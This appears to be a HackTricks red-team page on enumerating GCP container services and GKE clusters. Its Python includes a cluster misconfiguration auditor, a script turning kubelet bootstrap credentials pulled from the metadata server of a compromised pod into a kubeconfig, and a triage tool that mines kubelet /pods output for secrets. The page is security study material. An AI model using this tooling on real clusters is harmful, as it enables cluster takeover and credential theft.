{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The `gcloud container` command group covers most of the container-based services GCP offers (Container Registry images, GKE clusters and their node pools). These are the most common commands to enumerate them:

```bash
gcloud container images list
gcloud container images list --repository us.gcr.io/<project-name> # also search the regional registries (us.gcr.io, eu.gcr.io, asia.gcr.io)
gcloud container images describe <name>
gcloud container subnets list-usable
gcloud container clusters list
gcloud container clusters describe <name>
gcloud container clusters get-credentials [NAME]

# Run a container locally
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh

# Login & Download
sudo docker login -u oauth2accesstoken -p $(gcloud auth print-access-token) https://HOSTNAME
## where HOSTNAME is gcr.io, us.gcr.io, eu.gcr.io, or asia.gcr.io.
sudo docker pull HOSTNAME/<project-name>/<image-name>
```
In the following page you can check how to abuse container permissions to escalate privileges:
{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %} gcp-container-privesc.md {% endcontent-ref %}
Node pools are the groups of Compute Engine VMs (nodes) that run the workloads of a GKE cluster. Each pool has its own node configuration (service account, OAuth scopes, instance metadata, image type), so enumerate every pool rather than only the cluster's default one:

```bash
# Pools of machines used by the cluster
gcloud container node-pools list --zone <zone> --cluster <cluster>
gcloud container node-pools describe --cluster <cluster> --zone <zone> <node-pool>
```
For background on what Kubernetes is, check this page:
{% content-ref url="../../kubernetes-security/" %} kubernetes-security {% endcontent-ref %}
First, check whether any Kubernetes clusters exist in your project:

```bash
gcloud container clusters list
```

If there is a cluster, `gcloud` can automatically configure your `~/.kube/config` file. This file is used to authenticate you when you use `kubectl`, the native CLI for interacting with K8s clusters. Try this command (use `--zone` instead of `--region` for a zonal cluster):

```bash
gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION]
```

Then take a look at the `~/.kube/config` file to see the generated credentials. Rather than storing a static token, it tells `kubectl` to obtain and refresh access tokens using the same identity your active `gcloud` session is using. This of course requires the correct permissions in place (at minimum `container.clusters.get` to run `get-credentials`).

Once this is set up, you can try the following command to get the cluster configuration:

```bash
kubectl cluster-info
```

You can read more about `gcloud` for containers here.

This is a simple script to enumerate Kubernetes in GCP: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum
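The `describe`/`list` output above is long and most of it is noise. As an added example (written for this page, not taken from the original page or from the gcp_k8s_enum script), the following Python reads the JSON that `gcloud container clusters list --format=json` (or `describe --format=json`) prints and flags the settings an attacker cares about: legacy metadata endpoints left enabled on a node pool, nodes running as the default compute service account with the `cloud-platform` scope, no Workload Identity, legacy ABAC, no master authorized networks, client certificates issued, Shielded Nodes off and public node IPs. The field names follow the GKE Cluster resource; the two sample clusters embedded in the block are constructed for the example and the finding labels are my own.

```python
"""Flag risky GKE cluster settings in `gcloud container clusters list --format=json` output."""
import json
import sys

CLOUD_PLATFORM_SCOPE = "https://www.googleapis.com/auth/cloud-platform"

# Constructed sample in the shape gcloud prints (an array of Cluster resources).
# Project names, addresses and values are made up for this example.
SAMPLE_CLUSTERS_JSON = r"""
[
  {
    "name": "legacy-prod",
    "location": "us-central1-a",
    "endpoint": "203.0.113.10",
    "nodeConfig": {"serviceAccount": "default",
      "oauthScopes": ["https://www.googleapis.com/auth/cloud-platform"], "metadata": {}},
    "nodePools": [
      {"name": "default-pool", "config": {"serviceAccount": "default",
        "oauthScopes": ["https://www.googleapis.com/auth/cloud-platform"], "metadata": {}}}
    ],
    "legacyAbac": {"enabled": true},
    "masterAuth": {"clientCertificateConfig": {"issueClientCertificate": true}}
  },
  {
    "name": "hardened",
    "location": "us-central1",
    "endpoint": "10.0.0.2",
    "nodeConfig": {"serviceAccount": "gke-nodes@example-project.iam.gserviceaccount.com",
      "oauthScopes": ["https://www.googleapis.com/auth/devstorage.read_only"],
      "metadata": {"disable-legacy-endpoints": "true"}},
    "nodePools": [
      {"name": "pool-1", "config": {"serviceAccount": "gke-nodes@example-project.iam.gserviceaccount.com",
        "oauthScopes": ["https://www.googleapis.com/auth/devstorage.read_only"],
        "metadata": {"disable-legacy-endpoints": "true"}}}
    ],
    "workloadIdentityConfig": {"workloadPool": "example-project.svc.id.goog"},
    "privateClusterConfig": {"enablePrivateNodes": true},
    "masterAuthorizedNetworksConfig": {"enabled": true, "cidrBlocks": [{"cidrBlock": "198.51.100.0/24"}]},
    "shieldedNodes": {"enabled": true},
    "legacyAbac": {},
    "masterAuth": {"clientCertificateConfig": {}}
  }
]
"""


def audit_cluster(cluster: dict) -> list:
    """Return a list of finding labels (my own naming) for one cluster dict."""
    findings = []
    # Each node pool carries its own NodeConfig; fall back to the cluster-level one if none listed.
    pools = cluster.get("nodePools") or [{"name": "default-pool", "config": cluster.get("nodeConfig", {})}]
    for pool in pools:
        cfg = pool.get("config", {})
        pname = pool.get("name", "?")
        # The v1beta1 metadata endpoint is what exposed kube-env / bootstrap creds to pods.
        if cfg.get("metadata", {}).get("disable-legacy-endpoints") != "true":
            findings.append(f"legacy-metadata-endpoints:{pname}")
        # Default compute SA + cloud-platform scope: any pod that reaches the metadata server
        # gets a token that is usually Editor on the whole project.
        if cfg.get("serviceAccount", "default") == "default" and CLOUD_PLATFORM_SCOPE in cfg.get("oauthScopes", []):
            findings.append(f"default-sa-cloud-platform:{pname}")
    if not cluster.get("workloadIdentityConfig", {}).get("workloadPool"):
        findings.append("no-workload-identity")  # pods see the node SA via metadata
    if cluster.get("legacyAbac", {}).get("enabled"):
        findings.append("legacy-abac")
    if not cluster.get("masterAuthorizedNetworksConfig", {}).get("enabled"):
        findings.append("no-master-authorized-networks")
    if cluster.get("masterAuth", {}).get("clientCertificateConfig", {}).get("issueClientCertificate"):
        findings.append("client-cert-issued")  # static cluster-admin cert lives in the cluster config
    if not cluster.get("shieldedNodes", {}).get("enabled"):
        findings.append("shielded-nodes-off")
    if not cluster.get("privateClusterConfig", {}).get("enablePrivateNodes"):
        findings.append("public-node-ips")
    return findings


def audit(json_text: str) -> dict:
    """Map cluster name -> findings; accepts the array from `list` or the object from `describe`."""
    data = json.loads(json_text)
    clusters = data if isinstance(data, list) else [data]
    return {c["name"]: audit_cluster(c) for c in clusters}


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CLUSTERS_JSON
    for name, found in audit(text).items():
        print(f"{name}: {', '.join(found) if found else 'no findings'}")
```

Usage: `gcloud container clusters list --format=json | python3 gke_audit.py`; with no piped input it runs against the embedded sample. A `legacy-metadata-endpoints` or `default-sa-cloud-platform` hit on any pool is the signal that compromising a single pod is likely to yield project-level credentials.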
The TLS bootstrap privilege escalation technique initially allowed privesc inside the GKE cluster, effectively letting an attacker who had compromised a single pod fully compromise it.
This is because GKE exposed the kubelet TLS bootstrap credentials in the instance metadata (the `kube-env` attribute), which was reachable by anyone who could send requests to the metadata server from a compromised pod.
The technique used is explained in the following posts:
- https://www.4armed.com/blog/hacking-kubelet-on-gke/
- https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
- https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/
And this tool was created to automate the process: https://github.com/4ARMED/kubeletmein
However, the technique relied on the fact that, with the metadata credentials, it was possible to submit a CSR (Certificate Signing Request) for a new node identity, which was automatically approved.
In my tests those requests are no longer approved automatically, so I'm not sure whether this technique is still valid.
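To check for yourself whether the technique still works you first need the bootstrap material out of `kube-env`. As an added example (not from the original page or from kubeletmein), the following Python parses the flat `KEY: value` lines of a `kube-env` attribute, verifies that `CA_CERT`, `KUBELET_CERT` and `KUBELET_KEY` decode to PEM blocks, and writes a kubeconfig that uses them as a client certificate against `KUBERNETES_MASTER_NAME`. The `kube-env` text embedded in the block is constructed and its PEM blobs are placeholders, not real certificates or keys; the kubeconfig names (`gke`, `kubelet-bootstrap`) are my own.

```python
"""Turn the TLS bootstrap material in GKE's kube-env metadata attribute into a kubeconfig."""
import base64
import json
import re
import sys


def _b64(pem: str) -> str:
    return base64.b64encode(pem.encode()).decode()


# Placeholder PEM blobs for the constructed sample below (not real key material).
FAKE_CA = "-----BEGIN CERTIFICATE-----\nFAKE-CA-CERT-FOR-EXAMPLE\n-----END CERTIFICATE-----\n"
FAKE_CERT = "-----BEGIN CERTIFICATE-----\nFAKE-KUBELET-BOOTSTRAP-CERT\n-----END CERTIFICATE-----\n"
FAKE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nFAKE-KUBELET-BOOTSTRAP-KEY\n-----END RSA PRIVATE KEY-----\n"

# Constructed sample of the kube-env attribute. A real one is fetched from inside the pod with:
#   curl -sH "Metadata-Flavor: Google" \
#     http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env
SAMPLE_KUBE_ENV = f"""ALLOCATE_NODE_CIDRS: "true"
CA_CERT: {_b64(FAKE_CA)}
CLUSTER_NAME: example-cluster
KUBELET_CERT: {_b64(FAKE_CERT)}
KUBELET_KEY: {_b64(FAKE_KEY)}
KUBERNETES_MASTER_NAME: 203.0.113.50
"""

KUBE_ENV_LINE = re.compile(r'^([A-Z0-9_]+):\s*"?([^"\n]*?)"?\s*$')


def parse_kube_env(text: str) -> dict:
    """Parse single-line `KEY: value` entries into a dict, stripping surrounding quotes."""
    env = {}
    for line in text.splitlines():
        m = KUBE_ENV_LINE.match(line.strip())
        if m:
            env[m.group(1)] = m.group(2)
    return env


def extract_bootstrap_creds(env: dict) -> dict:
    """Pull the bootstrap cert/key/CA and the API server address, checking each decodes to PEM."""
    creds = {}
    for key, header in (("CA_CERT", "CERTIFICATE"), ("KUBELET_CERT", "CERTIFICATE"),
                        ("KUBELET_KEY", "PRIVATE KEY")):
        raw = env.get(key)
        if not raw:
            # Absent on nodes whose bootstrap no longer goes through kube-env.
            raise ValueError(f"{key} missing from kube-env")
        pem = base64.b64decode(raw).decode()
        first = pem.splitlines()[0] if pem else ""
        if not first.startswith("-----BEGIN") or header not in first:
            raise ValueError(f"{key} does not decode to a {header} PEM block")
        creds[key] = raw  # kubeconfig *-data fields expect base64-encoded PEM, so keep it encoded
    if "KUBERNETES_MASTER_NAME" not in env:
        raise ValueError("KUBERNETES_MASTER_NAME missing from kube-env")
    creds["server"] = "https://" + env["KUBERNETES_MASTER_NAME"]
    return creds


def build_kubeconfig(creds: dict) -> dict:
    """Build a kubeconfig dict that authenticates with the bootstrap client certificate."""
    return {
        "apiVersion": "v1",
        "kind": "Config",
        "clusters": [{"name": "gke", "cluster": {
            "server": creds["server"], "certificate-authority-data": creds["CA_CERT"]}}],
        "users": [{"name": "kubelet-bootstrap", "user": {
            "client-certificate-data": creds["KUBELET_CERT"], "client-key-data": creds["KUBELET_KEY"]}}],
        "contexts": [{"name": "gke", "context": {"cluster": "gke", "user": "kubelet-bootstrap"}}],
        "current-context": "gke",
    }


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_KUBE_ENV
    # kubectl's config loader accepts JSON-encoded kubeconfigs, so no YAML library is needed.
    print(json.dumps(build_kubeconfig(extract_bootstrap_creds(parse_kube_env(text))), indent=2))
```

Usage from a compromised pod that can reach the metadata server: pipe the `curl` shown in the comment into the script and save the output as `bootstrap.json`, then run `kubectl --kubeconfig bootstrap.json auth can-i create certificatesigningrequests` to see whether the bootstrap identity can still submit CSRs, and after submitting one `kubectl --kubeconfig bootstrap.json get csr` to see whether it stays `Pending` (the behaviour observed above) or is auto-approved.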
In this post, a kubelet read-only API (port 10255) was found reachable from inside a pod in GKE, returning the details of the pods running on that node:

```bash
curl -v -k http://10.124.200.1:10255/pods
```

Even though this read-only API doesn't allow modifying resources, the response can contain sensitive information (environment variables with inline credentials, the names of mounted Secrets, service accounts, host mounts). The `/pods` endpoint was found using Kiterunner.
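The `/pods` response is a full `PodList` and is tedious to read by eye. As an added example (my own code, not from the post or the original page), the following Python triages it: for every pod it records the service account, whether it is privileged or on the host network, environment variables with literal values whose names look like credentials, the Secret objects referenced through `secretKeyRef`, `envFrom` or secret volumes, and any `hostPath` mounts. The sample `PodList` in the block is constructed for the example, and the "looks sensitive" name heuristic is my own.

```python
"""Triage a kubelet read-only /pods response for attacker-relevant details."""
import json
import sys

# Constructed sample of a kubelet /pods response (kind PodList). Names and values are made up.
SAMPLE_PODS_JSON = r"""
{
  "kind": "PodList", "apiVersion": "v1", "metadata": {},
  "items": [
    {
      "metadata": {"name": "billing-api-7d9f", "namespace": "prod"},
      "spec": {
        "nodeName": "gke-prod-default-pool-abc123",
        "serviceAccountName": "billing-sa",
        "hostNetwork": false,
        "volumes": [
          {"name": "creds", "secret": {"secretName": "billing-db-creds"}},
          {"name": "sa-token", "projected": {"sources": [{"serviceAccountToken": {"path": "token"}}]}}
        ],
        "containers": [{
          "name": "api", "image": "gcr.io/example-project/billing-api:1.4",
          "env": [
            {"name": "DB_HOST", "value": "10.10.0.5"},
            {"name": "DB_PASSWORD", "value": "hunter2"},
            {"name": "API_KEY", "valueFrom": {"secretKeyRef": {"name": "billing-api-key", "key": "key"}}}
          ],
          "envFrom": [{"secretRef": {"name": "billing-smtp"}}],
          "securityContext": {}
        }]
      }
    },
    {
      "metadata": {"name": "node-agent-x1", "namespace": "kube-system"},
      "spec": {
        "nodeName": "gke-prod-default-pool-abc123",
        "serviceAccountName": "node-agent",
        "hostNetwork": true,
        "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
        "containers": [{
          "name": "agent", "image": "gcr.io/example-project/agent:2.0",
          "env": [],
          "securityContext": {"privileged": true},
          "volumeMounts": [{"name": "root", "mountPath": "/host"}]
        }]
      }
    }
  ]
}
"""

# Heuristic (my own): env var names containing these fragments are worth a closer look.
SECRET_HINTS = ("PASS", "SECRET", "TOKEN", "KEY", "CRED")


def looks_sensitive(name: str) -> bool:
    return any(hint in name.upper() for hint in SECRET_HINTS)


def triage_pods(podlist_json: str) -> list:
    """Return one summary dict per pod in the PodList."""
    items = json.loads(podlist_json).get("items", [])
    summaries = []
    for pod in items:
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        containers = spec.get("containers", []) + spec.get("initContainers", [])
        entry = {
            "pod": f"{meta.get('namespace')}/{meta.get('name')}",
            "node": spec.get("nodeName"),
            "service_account": spec.get("serviceAccountName", "default"),
            "host_network": bool(spec.get("hostNetwork")),
            "privileged": any((c.get("securityContext") or {}).get("privileged") for c in containers),
            "inline_secrets": {},   # literal env values whose names look like credentials
            "secret_refs": set(),   # Secret object names the pod references or mounts
            "host_paths": [],       # hostPath volumes: node filesystem access
        }
        for c in containers:
            for e in c.get("env", []):
                if "value" in e and looks_sensitive(e["name"]):
                    entry["inline_secrets"][e["name"]] = e["value"]
                ref = (e.get("valueFrom") or {}).get("secretKeyRef")
                if ref:
                    entry["secret_refs"].add(ref["name"])
            for src in c.get("envFrom", []):
                if "secretRef" in src:
                    entry["secret_refs"].add(src["secretRef"]["name"])
        for v in spec.get("volumes", []):
            if "secret" in v:
                entry["secret_refs"].add(v["secret"]["secretName"])
            if "hostPath" in v:
                entry["host_paths"].append(v["hostPath"]["path"])
        entry["secret_refs"] = sorted(entry["secret_refs"])
        summaries.append(entry)
    return summaries


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PODS_JSON
    print(json.dumps(triage_pods(text), indent=2))
```

Usage: `curl -sk http://<node-ip>:10255/pods | python3 triage_pods.py`. Inline values come back in clear (the kubelet hands you the rendered pod spec); `secretKeyRef` and volume references only give you Secret names, which then become targets for whatever service-account token you hold.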